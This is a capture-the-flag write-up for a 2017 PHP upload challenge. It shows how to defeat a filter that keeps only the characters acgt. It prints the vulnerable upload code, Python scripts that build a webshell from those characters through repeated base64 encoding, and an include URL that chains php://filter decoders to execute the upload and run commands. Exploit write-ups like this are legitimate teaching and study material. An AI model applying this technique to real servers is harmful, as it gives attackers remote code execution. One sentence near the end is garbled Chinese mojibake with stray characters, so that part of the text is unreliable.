The approach to this challenge was inspired by 王一航; go and read his Jianshu page, it is really good.
Link: http://www.reibang.com/u/bf30f18c872c
Challenge background
In this challenge the source code can be read directly through a PHP stream wrapper (php://filter); the hard part is the regex filter inside it. The upload handler strips every character other than acgt (the regex is case-insensitive, so ACGT survive too), so a normal webshell cannot be uploaded.
<?php
error_reporting(0);
session_start();
if (isset($_FILES[file]) && $_FILES[file]['size'] < 65536) {
    $d = "./tmp/" . md5(session_id());
    @mkdir($d);
    $b = "$d/" . pathinfo($_FILES[file][name], 8);
    file_put_contents($b, preg_replace('/[^acgt]/is', '', file_get_contents($_FILES[file][tmp . "_name"])));
    echo $b;
}
?>
Approach
When I saw 王一航 mention in his blog that it could be solved with base64, it suddenly clicked.
Base64 property
Base64 decoding is error-tolerant; you can try it yourself.
See the figure below.
In the figure, we first tested what aaaa decodes to as base64, which you can see in the image. Then we tested what iiii decodes to. Finally we used aaaaaaaaaaaaaaaa as the base64 input and found that the decoded result matched iiii.
Base64 uses only 64 characters; anything outside those 64 is simply ignored during decoding, which is the error tolerance mentioned above.
Using this property together with the example above: when only the single character a is available, one base64 decode can already produce i. By the same reasoning, as the number of decoding passes grows, a handful of characters can be expanded to all 64, and from there the base64 encoding of any text can be produced.
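The tolerance described above, shown with Python's decoder standing in for PHP's convert.base64-decode filter (an added example, not code from the original writeup). The inputs aaaa, iiii and sixteen a's are the ones from the screenshot experiment; strict_decode_ok shows the validating mode a hardened decoder would use instead.

```python
import base64
import binascii

# The 64 characters a base64 decoder actually reads; everything else is
# discarded by a lenient decoder, which is what the writeup relies on.
BASE64_ALPHABET = set(
    b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
)


def lenient_decode(data: bytes) -> bytes:
    """Decode like PHP's convert.base64-decode filter: bytes outside the
    base64 alphabet are silently dropped (Python's default, validate=False)."""
    return base64.b64decode(data)


def surviving_alphabet(data: bytes) -> bytes:
    """Return only the bytes of `data` that a lenient decoder will read,
    i.e. what the next decoding pass effectively sees."""
    return bytes(b for b in data if b in BASE64_ALPHABET)


def strict_decode_ok(data: bytes) -> bool:
    """validate=True refuses any input containing non-alphabet bytes; a decoder
    configured this way breaks the repeated-decode trick at the first pass."""
    try:
        base64.b64decode(data, validate=True)
        return True
    except binascii.Error:
        return False


def decode_chain(data: bytes, rounds: int) -> bytes:
    """Apply the lenient decoder `rounds` times, as a chained php://filter does."""
    for _ in range(rounds):
        data = lenient_decode(data)
    return data


if __name__ == "__main__":
    # Constructed input from the writeup: sixteen 'a' characters.
    once = lenient_decode(b"a" * 16)                       # b'i\xa6\x9a' * 4
    print(once, surviving_alphabet(once))                  # only 'iiii' is readable
    print(lenient_decode(once) == lenient_decode(b"iiii"))  # True
    print(strict_decode_ok(once))                          # False
```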
Implementation
First we take the usable characters acgtACGT and enumerate their combinations to expand the character set; then we repeat the process until we have what we need.
import base64
import binascii
import itertools

list_use = 'acgtACGT'   # characters that survive the upload filter (the regex is case-insensitive)
can_see = 'QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm0123456789+/='

def make_list(list_now, id):
    # Try every 4-character group built from the current alphabet; each group
    # base64-decodes to 3 bytes. Keep the groups whose decoded bytes contain
    # exactly one base64 character and record "group******char" in list_<id>.txt.
    with open("./list_" + id + ".txt", "a+") as f:
        for i, j, k, l in itertools.product(list_now, repeat=4):
            sourlist = i + j + k + l
            try:
                ordlist = base64.b64decode(sourlist)
            except binascii.Error:
                continue   # groups with a misplaced '=' do not decode cleanly
            result = ''.join(chr(z) for z in ordlist if chr(z) in can_see)
            if len(result) == 1:
                f.writelines(sourlist + "******" + result + "\n")
Here I have pasted a function written in a very simple, brute-force way: it writes every combination to a file. Crude but easy to understand, even if it is pretty low-tech...
Next, we tidy up the file's contents so that no expanded character appears twice.
def do_list(id):
    # Deduplicate list_<id>.txt: keep the first group found for each new
    # character, write it to list_do<id>.txt and return the expanded alphabet.
    a_list = ''
    with open("./list_" + id + ".txt", "r") as f:
        x = f.read().split('\n')
    with open("./list_do" + id + ".txt", "a+") as fb:
        for i in x:
            if not i:
                continue           # skip the empty trailing line
            sour = i.split('******')
            mid_1 = sour[0]        # the 4-character group
            mid_2 = sour[1][0]     # the single character it expands to
            if mid_2 not in a_list:
                a_list += mid_2
                fb.writelines(mid_1 + "******" + mid_2 + "\n")
    return a_list
Equally crude; silly but cute, isn't it? The tidied result is saved to a separate file.
def change(id, ord_base):
    # Map every character of ord_base back to the 4-character group recorded
    # for it in list_do<id>.txt, i.e. go one base64-decode level down.
    result = ''
    mid_1 = []
    mid_2 = []
    with open("./list_do" + id + ".txt", "r") as f:
        x = f.read().split('\n')
    for i in x:
        if not i:
            continue
        sour = i.split('******')
        mid_1.append(sour[0])
        mid_2.append(sour[1][0])
    for j in ord_base:
        num = mid_2.index(j)   # ValueError if j is not reachable at this level
        result += mid_1[num]
    return result
最后舆蝴,這個(gè)就是轉(zhuǎn)換的過程题诵,就是從目標(biāo)字符的base64編碼,向下轉(zhuǎn)換赠潦,直到只有acgt
出現(xiàn)
結(jié)果
我得到了這個(gè)文件:
Base64-decode it four times and you get what we need.
And that is it.
Solving the challenge
Because I mainly focused on upload.php, I did not save the other source files; to reproduce it locally I simply wrote a page that does an include.
We then name the generated file exp.php.txt, which is straightforward.
After upload it becomes exp.php.
Then on the including page we can write the URL like this:
http://127.0.0.1/2017xdctf/include.php?file=php://filter/convert.base64-decode/resource=php://filter/convert.base64-decode/resource=php://filter/convert.base64-decode/resource=php://filter/convert.base64-decode/resource=./tmp/8a1b5fc5f0fe17e9ba8538a991871371/exp.php
Result:
As you can see, the dir command was executed.